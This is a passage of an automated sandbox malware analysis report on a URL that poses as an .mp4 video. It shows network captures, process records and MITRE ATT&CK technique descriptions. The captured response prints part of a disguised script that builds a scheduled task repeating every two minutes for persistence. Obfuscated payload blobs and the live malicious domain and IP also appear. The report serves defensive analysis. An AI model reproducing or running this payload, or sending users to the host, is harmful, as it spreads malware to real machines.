Aug 29, 2024 18:37:33.443840981 CEST	1236	IN	Data Raw: 2f 39 41 32 38 33 21 2a 2a 2a 2a 2a 2f 38 2a 2a 46 2a 2a 2a 2a 2a 21 32 2a 38 21 44 31 2a 32 2a 21 32 2a 33 31 2f 33 44 21 33 2f 2f 31 32 35 2a 41 31 46 2a 46 35 45 21 35 2a 46 2a 2a 2a 2a 2a 2a 45 2a 2a 31 2a 2a 2a 2a 32 35 2a 31 2a 2a 2a 2a 37 Data Ascii: /9A283!***/8F****!28!D12!231/3D!3//125A1FF5E!5F****E1***251***7/2***!81***!/2**95**71***5***/B1**F5**C5**AFFFFFFFB1**12***BB2***38B/2***7EF***!2833*/7E13*!2833**/281****
Aug 29, 2024 18:37:33.443854094 CEST	752	IN	Data Raw: 44 46 46 46 46 37 45 2a 45 2a 2a 2a 2a 2a 21 31 46 2a 39 39 41 32 38 33 21 2a 2a 2a 2a 2a 2f 38 2a 31 38 2a 2a 2a 2a 2a 21 37 45 2a 45 2a 2a 2a 2a 2a 21 31 46 2a 41 39 41 32 38 33 21 2a 2a 2a 2a 2a 2f 38 2a 31 39 2a 2a 2a 2a 2a 21 2a 2f 32 2a 21 Data Ascii: DFFFF7EE***!1F99A283!****/818****!7EE****!1FA9A283!****/819****!/2!9A!FB5A285FDDFBE/138/EFDFFFF7EF**!2833*/7E18*!2833**/289***2B822****!/2/7F3F!C/5A27EF/2/8/1383EFDFFFF7EE***!1A9A283!**/813*****!
Aug 29, 2024 18:37:33.516840935 CEST	1236	IN	Data Raw: 45 31 35 2a 45 2a 2a 2a 2a 2a 32 31 31 31 38 32 2a 31 38 45 41 21 37 2f 2f 35 41 32 2a 39 42 2f 21 41 35 39 45 2f 31 33 38 35 2a 46 46 46 46 46 46 31 2f 2a 42 32 2a 38 43 2f 46 39 32 21 35 33 38 21 21 46 46 46 46 46 46 32 38 31 39 2a 2a 2a 2a 2a Data Ascii: E15E***21118218EA!7//5A29B/!A59E/1385FFFFFF1/B28C/F92!538!!FFFFFF2819***A1D8D23**125D27***!281A*A/F1B**A13!2819***A1D8D23**125D2/***!281A*A/F1B*A2/7E2!**!27E1C***A7E1D*A7E1D*A1/2!*****87E
Aug 29, 2024 18:37:33.516860008 CEST	1236	IN	Data Raw: 38 38 44 2a 31 2a 2a 2a 2a 2a 31 32 35 31 2f 2a 33 41 32 32 35 31 37 31 31 2a 2f 31 46 32 38 35 38 38 43 32 2a 2a 2a 2a 2a 2a 31 41 32 41 32 32 38 32 31 2a 2a 2a 2a 2a 41 41 35 32 2a 2a 2a 2a 2a 2a 31 31 33 31 32 31 31 2a 44 32 43 2a 38 32 2a 32 Data Ascii: 88D1***1251/3A2251711/1F28588C2***1A2A22821*AA52***1131211D2C822F5F92!C252B/21E8FF7B252/38ECFDFFFF7E1D***!97B2***!118/FC***/2C8277CF!3D2252B/2!D792BE7252/11182FE8559F/5A/138BBFDFFFF7E1E****!97B2***!118
Aug 29, 2024 18:37:33.516866922 CEST	1236	IN	Data Raw: 31 2a 2f 31 43 35 38 32 38 32 33 2a 2a 2a 2a 2a 41 31 33 31 2a 31 31 31 38 32 2a 2a 2f 33 38 44 38 21 35 35 41 32 2a 32 45 32 2f 45 38 32 2a 2f 31 33 38 41 2a 46 42 46 46 46 46 31 31 31 38 32 2a 38 21 46 38 38 31 35 46 35 41 32 2a 37 33 2f 39 2f Data Ascii: 1/1C582823***A13111182*/38D8!55A22E2/E82/138AFBFFFF111828!F8815F5A273/9/E2/1388DFBFFFF11F1F285813F2!CAA8!1387CFBFFFF111317581313111828CA35C75A22FC823B//138/3FBFFFF7E1B***!72A81/7283!***/17178D1****1251/97B2****!8C
Aug 29, 2024 18:37:33.517514944 CEST	1236	IN	Data Raw: 37 31 38 38 44 2a 31 2a 2a 2a 2a 2a 31 32 35 31 37 31 38 38 44 2a 31 2a 2a 2a 2a 2a 31 32 35 31 2f 2a 33 41 32 32 35 31 37 31 46 33 43 38 43 32 2a 2a 2a 2a 2a 2a 31 41 32 41 32 32 38 32 31 2a 2a 2a 2a 2a 41 41 35 32 2a 2a 2a 2a 2a 2a 31 31 33 2a Data Ascii: 7188D1***12517188D1****1251/3A225171F3C8C2****1A2A22821*AA52***113/D29**12812**A11!282****A72A81/7283!***/17188D1****12517188D1****1251/3A2251711/1F3!588C2***1A2A22821*AA52***11372B3***282/
Aug 29, 2024 18:37:33.517525911 CEST	1236	IN	Data Raw: 38 32 43 2a 2a 2a 2a 2a 41 2a 41 2a 2f 2f 46 32 44 2a 2a 2a 2a 2a 41 31 45 35 42 31 37 35 39 31 37 35 38 38 44 32 33 2a 2a 2a 2a 2a 31 2a 42 31 2f 2a 43 32 2a 42 42 21 44 35 21 42 44 32 2a 46 2f 44 43 31 2f 41 46 2f 31 32 35 2a 44 31 43 35 45 21 Data Ascii: 82C****AA//F2D**A1E5B175917588D23**1B1/C2BB!D5!BD2F/DC1/AF/125D1C5E!5/***D!FFFFFF57**!!***2**2B**11***2B5592C9B911995A2159!/9E5/12BC878/81E5A1E/F2E***A18282F**A9C29A28ECED2BAE878E/917593182
Aug 29, 2024 18:37:33.517962933 CEST	1236	IN	Data Raw: 2f 2a 2a 2a 45 2a 38 45 46 2a 37 2a 2f 2a 2a 31 43 2a 38 32 35 2a 37 2a 2f 2a 2a 33 39 2a 38 35 32 2a 38 2a 2f 2a 2a 2f 43 2a 38 39 41 2a 2f 2a 41 2a 2a 38 37 2a 38 39 45 2a 38 2a 2f 2a 2a 42 2f 2a 38 33 37 2a 2a 2a 2f 2a 2a 43 44 2a 38 33 37 2a Data Ascii: /**E8EF7/*1C8257/*398528/*/C89A/A*8789E8/*B/837*/CD837/DF8EF7/*5937*/E937*/1F937/2C937/!/937/!C937/599/29//E937*/7399A//92937*/98937/BB937/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	43.130.11.15	80	5236	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 18:37:33.700558901 CEST	357	OUT	GET /amj/2.mp4 HTTP/1.1 Host: passtcnet.homeunix.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: identity;q=1, ;q=0 Accept: /* Referer: http://passtcnet.homeunix.com/amj/2.mp4 Accept-Language: en-US,en;q=0.9 Range: bytes=0-
Aug 29, 2024 18:37:33.875133038 CEST	1236	IN	HTTP/1.1 206 Partial Content Date: Thu, 29 Aug 2024 16:37:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 15 Jul 2024 16:16:32 GMT ETag: "2b52c-61d4b8d619800" Accept-Ranges: bytes Content-Length: 177452 Content-Range: bytes 0-177451/177452 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: video/mp4 Data Raw: 0d 0a 24 43 6f 6e 74 65 6e 74 20 3d 20 40 27 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 31 36 22 3f 3e 0d 0a 3c 54 61 73 6b 20 76 65 72 73 69 6f 6e 3d 22 31 2e 34 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 32 30 30 34 2f 30 32 2f 6d 69 74 2f 74 61 73 6b 22 3e 0d 0a 20 20 3c 54 72 69 67 67 65 72 73 3e 0d 0a 20 20 20 20 3c 54 69 6d 65 54 72 69 67 67 65 72 3e 0d 0a 20 20 20 20 20 20 3c 52 65 70 65 74 69 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 49 6e 74 65 72 76 61 6c 3e 50 54 32 4d 3c 2f 49 6e 74 65 72 76 61 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 53 74 6f 70 41 74 44 75 72 61 74 69 6f 6e 45 6e 64 3e 66 61 6c 73 65 3c 2f 53 74 6f 70 41 74 44 75 72 61 74 69 6f 6e 45 6e 64 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 65 70 65 74 69 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 3c 53 74 61 72 74 42 6f 75 6e 64 61 72 79 3e 32 30 32 33 2d 30 31 2d 30 31 54 30 [TRUNCATED] Data Ascii: $Content = @'<?xml version="1.0" encoding="UTF-16"?><Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <TimeTrigger> <Repetition> <Interval>PT2M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <StartBoundary>2023-01-01T00:00:00</StartBoundary> <Enabled>true</Enabled> </TimeTrigger> </Triggers> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
Aug 29, 2024 18:37:33.875374079 CEST	1236	IN	Data Raw: 20 20 20 3c 52 65 73 74 61 72 74 4f 6e 49 64 6c 65 3e 66 61 6c 73 65 3c 2f 52 65 73 74 61 72 74 4f 6e 49 64 6c 65 3e 0d 0a 20 20 20 20 3c 2f 49 64 6c 65 53 65 74 74 69 6e 67 73 3e 0d 0a 20 20 20 20 3c 41 6c 6c 6f 77 53 74 61 72 74 4f 6e 44 65 6d Data Ascii: <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> </Settings> <Actions Context="Author"> <Exec> <Command>C
Aug 29, 2024 18:37:33.875391960 CEST	1236	IN	Data Raw: 37 32 37 35 2f 45 32 2a 2f 39 2f 45 32 2a 21 21 21 46 35 33 32 2a 2f 44 2f 46 2f 21 2f 35 32 45 2a 44 2a 44 2a 41 32 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 35 2a 21 35 2a 2a 2a 2a 21 43 2a 31 2a 33 2a 2a 42 45 2a 41 45 2a 44 39 2a 2a 2a 2a Data Ascii: 7275/E2/9/E2!!!F532/D/F/!/52EDDA2!*************5!5***!C13BEAED9*************E2221B13**!!***/********3E/3**2***8*******12*****2*!***********!************C****2*********3!
Aug 29, 2024 18:37:33.876524925 CEST	1236	IN	Data Raw: 2a 31 32 35 31 2f 37 32 41 21 31 2f 2a 2a 37 2a 41 32 31 2f 2f 46 31 35 2a 2a 2a 2a 2a 41 38 2a 2a 45 2a 2a 2a 2a 2a 21 37 45 2a 45 2a 2a 2a 2a 2a 21 31 2f 39 41 32 38 33 21 2a 2a 2a 2a 2a 2f 38 2a 2a 46 2a 2a 2a 2a 2a 21 32 2a 38 21 44 31 2a 32 Data Ascii: 1251/72A!1/7A21//F15***A8E****!7EE***!1/9A283!*/8F****!28!D12!231/3D!3//125A1FF5E!5F****E1***251***7/2***!81***!/2**95**71***5***/B1**F5**C5**AFFFFFFFB1**12***BB2***38B/2*
Aug 29, 2024 18:37:33.876540899 CEST	752	IN	Data Raw: 32 38 2a 38 2a 2a 2a 2a 32 42 38 2a 32 31 2a 2a 2a 2a 2a 21 2a 2f 32 2a 45 38 21 44 46 39 31 37 35 41 32 2a 31 43 35 2a 32 42 35 37 2f 31 33 38 41 21 46 44 46 46 46 46 37 45 2a 45 2a 2a 2a 2a 2a 21 31 46 2a 39 39 41 32 38 33 21 2a 2a 2a 2a 2a 2f Data Ascii: 288**2B821****!/2E8!DF9175A21C52B57/138A!FDFFFF7EE****!1F99A283!****/818****!7EE****!1FA9A283!****/819****!/2!9A!FB5A285FDDFBE/138/EFDFFFF7EF**!2833*/7E18*!2833**/289***2B822****!/2/7F3F!C/5A27EF
Aug 29, 2024 18:37:33.939281940 CEST	1236	IN	Data Raw: 2a 46 2a 2a 2a 2a 2a 32 31 31 31 38 32 2a 46 46 44 42 42 31 2a 2f 35 41 32 2a 44 45 39 21 32 21 32 39 2f 31 33 38 2f 42 46 46 46 46 46 46 31 32 2a 33 46 45 31 35 2a 45 2a 2a 2a 2a 2a 32 31 31 31 38 32 2a 31 38 45 41 21 37 2f 2f 35 41 32 2a 39 42 Data Ascii: F***211182FFDBB1/5A2DE9!2!29/138/BFFFFFF123FE15E****21118218EA!7//5A29B/!A59E/1385FFFFFF1/B28C/F92!538!!FFFFFF2819***A1D8D23**125D27***!281A*A/F1B**A13!2819***A1D8D23**125D2/***!281A*A/F1B**A2/7E2!
Aug 29, 2024 18:37:33.939584970 CEST	1236	IN	Data Raw: 2a 21 32 38 32 2a 2a 2a 2a 2a 2a 41 37 32 41 38 31 2f 2a 2a 37 2a 32 38 33 21 2a 2a 2a 2a 2a 2f 31 37 31 38 38 44 2a 31 2a 2a 2a 2a 2a 31 32 35 31 37 31 38 38 44 2a 31 2a 2a 2a 2a 2a 31 32 35 31 2f 2a 33 41 32 32 35 31 37 31 31 2a 2f 31 46 32 38 Data Ascii: !282***A72A81/7283!***/17188D1****12517188D1****1251/3A2251711/1F28588C2***1A2A22821*AA52***1131211D2C822F5F92!C252B/21E8FF7B252/38ECFDFFFF7E1D***!97B2***!118/FC***/2C8277CF!3D2252B/2*!D792BE7252/111
Aug 29, 2024 18:37:33.939599037 CEST	1236	IN	Data Raw: 2a 2a 2a 2a 2a 31 31 33 31 2f 31 31 31 38 32 2a 46 45 35 37 43 41 31 45 35 41 32 2a 2f 31 45 44 32 44 33 39 2f 31 33 38 42 46 46 42 46 46 46 46 2a 33 31 31 2a 2f 31 43 35 38 32 38 32 33 2a 2a 2a 2a 2a 41 31 33 31 2a 31 31 31 38 32 2a 2a 2f 33 38 Data Ascii: ****1131/11182FE57CA1E5A2/1ED2D39/138BFFBFFFF311/1C582823***A13111182*/38D8!55A22E2/E82/138AFBFFFF111828!F8815F5A273/9/E2/1388DFBFFFF11F1F285813F2!CAA8!1387CFBFFFF111317581313111828CA35C75A22FC823B//138/3FBFFFF7E1B*****!7
Aug 29, 2024 18:37:33.940907001 CEST	1236	IN	Data Raw: 2a 2a 2a 2a 2a 31 32 38 31 32 2a 2a 2a 2a 2a 41 31 31 2a 21 32 38 32 2a 2a 2a 2a 2a 2a 41 37 32 41 38 31 2f 2a 2a 37 2a 32 38 33 21 2a 2a 2a 2a 2a 2f 31 37 31 38 38 44 2a 31 2a 2a 2a 2a 2a 31 32 35 31 37 31 38 38 44 2a 31 2a 2a 2a 2a 2a 31 32 35 Data Ascii: ***12812**A11!282****A72A81/7283!***/17188D1****12517188D1****1251/3A225171F3C8C2****1A2A22821*AA52***113/D29**12812**A11!282****A72A81/7283!***/17188D1****12517188D1****1251/3A2251711*/1F3!588C2
Aug 29, 2024 18:37:33.940922976 CEST	896	IN	Data Raw: 37 32 35 42 31 37 2a 2a 37 2a 37 32 2f 33 31 37 2a 2a 37 2a 2f 46 32 42 2a 2a 2a 2a 2a 41 37 32 2f 37 31 37 2a 2a 37 2a 37 32 37 33 31 37 2a 2a 37 2a 32 38 32 43 2a 2a 2a 2a 2a 41 2a 41 2a 2f 2f 46 32 44 2a 2a 2a 2a 2a 41 31 45 35 42 31 37 35 39 Data Ascii: 725B17*772/317*7/F2B***A72/71777273177282C****AA//F2D**A1E5B175917588D23**1B1/C2BB!D5!BD2F/DC1/AF/125D1C5E!5/***D!FFFFFF57**!!***2**2B**11***2B5592C9B911995A2159!/9E5/12BC878/81E5A1E/F2E*
Aug 29, 2024 18:37:33.942097902 CEST	1236	IN	Data Raw: 2a 2a 2a 2a 2a 2a 33 33 2a 2a 2a 2a 2a 2a 31 32 2a 2a 2a 2a 2a 2a 2a 33 2a 2a 2a 2a 2a 2a 2a 33 2a 2a 2a 2a 2a 2a 2a 33 2a 2a 2a 2a 2a 2a 2a 31 2a 2a 2a 2a 2a 2a 2a 31 2a 2a 2a 2a 2a 2a 2a 31 2a 2a 2a 2a 2a 2a 2a 31 2a 2a 2a 2a 2a 2a 2a 31 2a 2a Data Ascii: ****33**12***3***3***3***1***1***1***1***1***2***2***1***3***D***1***A*******11********/3*37/5937/9337/A37/C3237*A!E5//5/7*/3

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-08-29 16:37:36 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-29 16:37:36 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=147557 Date: Thu, 29 Aug 2024 16:37:36 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-08-29 16:37:37 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-29 16:37:37 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=147509 Date: Thu, 29 Aug 2024 16:37:37 GMT Content-Length: 55 Connection: close X-CID: 2
2024-08-29 16:37:37 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 2692, Parent PID: 3096

General

Target ID:	0
Start time:	12:37:23
Start date:	29/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5236, Parent PID: 2692

General

Target ID:	2
Start time:	12:37:28
Start date:	29/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2036,i,16277629979526969890,13013760856666354857,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6476, Parent PID: 3096

General

Target ID:	3
Start time:	12:37:31
Start date:	29/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://passtcnet.homeunix.com/amj/2.mp4"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://passtcnet.homeunix.com/amj/2.mp4

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 42

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 2692, Parent PID: 3096

General

Chronological Activities

Analysis Process: chrome.exePID: 5236, Parent PID: 2692

General

Chronological Activities

Analysis Process: chrome.exePID: 6476, Parent PID: 3096

General

Chronological Activities

Disassembly

Windows Analysis Report
http://passtcnet.homeunix.com/amj/2.mp4